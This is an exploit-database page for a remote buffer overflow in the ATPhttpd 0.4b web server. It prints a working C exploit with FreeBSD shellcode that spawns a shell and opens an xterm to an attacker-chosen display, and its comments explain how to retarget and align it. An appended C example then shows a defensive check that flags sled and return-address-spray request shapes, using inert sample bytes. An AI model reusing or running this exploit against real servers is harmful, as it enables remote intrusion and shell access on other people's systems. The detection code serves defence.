ATPhttpd 0.4b – Remote Buffer Overflow
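Vulnerability ID | 1053600 | Vulnerability type | |
Published | 2002-07-12 | Updated | 2002-07-12 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | FreeBSD | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit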
/*
source: http://www.securityfocus.com/bid/5215/info
ATPhttpd is a small webserver designed for high-performance. It was developed by Yann Ramin.
There exist several exploitable buffer overflow conditions in ATPhttpd. Remote attackers may leverage these vulnerabilities to gain access on affected servers.
*/
/* atphttpd exploit.
/ The exploit sucks, if you get it wrong the first time the server just dies
/ so I didn't bother adding any offset argument to the exploit. Also if you
/ change the IP addy you may have to change the alignment a little.
/
/ http://www.badc0ded.com
*/
#define ret "x78xf5xbfxbf"
char FreeBSD[]= /* stolen lsd-pl.net shellcode */
"xebx25" /* jmp <cmdshellcode+39> */
"x59" /* popl %ecx */
"x31xc0" /* xorl %eax,%eax */
"x50" /* pushl %eax */
"x68""//sh" /* pushl $0x68732f2f */
"x68""/bin" /* pushl $0x6e69622f */
"x89xe3" /* movl %esp,%ebx */
"x50" /* pushl %eax */
"x66x68""-c" /* pushw $0x632d */
"x89xe7" /* movl %esp,%edi */
"x50" /* pushl %eax */
"x51" /* pushl %ecx */
"x57" /* pushl %edi */
"x53" /* pushl %ebx */
"x89xe7" /* movl %esp,%edi */
"x50" /* pushl %eax */
"x57" /* pushl %edi */
"x53" /* pushl %ebx */
"x50" /* pushl %eax */
"xb0x3b" /* movb $0x0b,%al */
"xcdx80" /* int $0x80 */
"xe8xd6xffxffxff" /* call <cmdshellcode+2> */
"/usr/X11R6/bin/xterm -display 127.0.0.1:0;";
main ()
{
int i;
for (i=0;i<=501;i++) // this would be a good place to change alignment
printf("x90");
printf("%s",FreeBSD);
for (i=0;i<=100;i++)
printf("%s",ret);
printf("nn");
}
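A defensive check for the request shape the exploit above is built to emit (a 502-byte sled of 0x90, the x86 NOP, then a payload, then one 4-byte word repeated 101 times), written as an added example that is not part of the original page or of ATPhttpd. The thresholds, function names and the inert bytes in the constructed sample are assumptions made for this illustration.

```c
#include <stdio.h>
#include <string.h>
/* Thresholds and names are assumptions for this example, not from the page. */
#define MAX_REQUEST_LINE 256  /* longest first line accepted */
#define MIN_SLED_RUN      32  /* identical bytes in a row treated as a sled */
#define MIN_WORD_REPEATS   8  /* repeats of one 4-byte word treated as a spray */
enum { REQ_OVERSIZE = 1, REQ_SLED = 2, REQ_WORD_SPRAY = 4 };
/* Length of the longest run of a single repeated byte. */
static size_t longest_byte_run(const unsigned char *b, size_t len) {
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (i > 0 && b[i] == b[i - 1]) ? run + 1 : 1;
        if (run > best) best = run;
    }
    return best;
}

/* Most consecutive repeats of one non-uniform 4-byte word, at any alignment. */
static size_t longest_word_repeat(const unsigned char *b, size_t len) {
    size_t best = 0, match = 0;
    for (size_t i = 4; i < len; i++) {
        int uniform = b[i] == b[i-1] && b[i-1] == b[i-2] && b[i-2] == b[i-3];
        match = (b[i] == b[i - 4] && !uniform) ? match + 1 : 0;
        if (match && match / 4 + 1 > best) best = match / 4 + 1;
    }
    return best;
}

/* Bitmask of reasons to reject and log a raw request before parsing it. */
int inspect_request(const unsigned char *b, size_t len) {
    const unsigned char *eol = memchr(b, '\n', len);
    size_t line = eol ? (size_t)(eol - b) : len;
    int flags = line > MAX_REQUEST_LINE ? REQ_OVERSIZE : 0;
    if (longest_byte_run(b, len) >= MIN_SLED_RUN) flags |= REQ_SLED;
    if (longest_word_repeat(b, len) >= MIN_WORD_REPEATS) flags |= REQ_WORD_SPRAY;
    return flags;
}
/* Constructed sample: same layout as the exploit's output, inert filler bytes. */
size_t make_sample(unsigned char *out) {
    size_t n = 502; memset(out, 0x90, n);        /* sled, 502 bytes */
    memcpy(out + n, "FILLER", 6); n += 6;        /* stands in for the payload */
    for (int i = 0; i < 101; i++, n += 4) memcpy(out + n, "ABCC", 4); /* word x101 */
    out[n++] = '\n'; out[n++] = '\n';
    return n;
}
int main(void) {
    unsigned char buf[1024];
    printf("flags=%d\n", inspect_request(buf, make_sample(buf)));
}
```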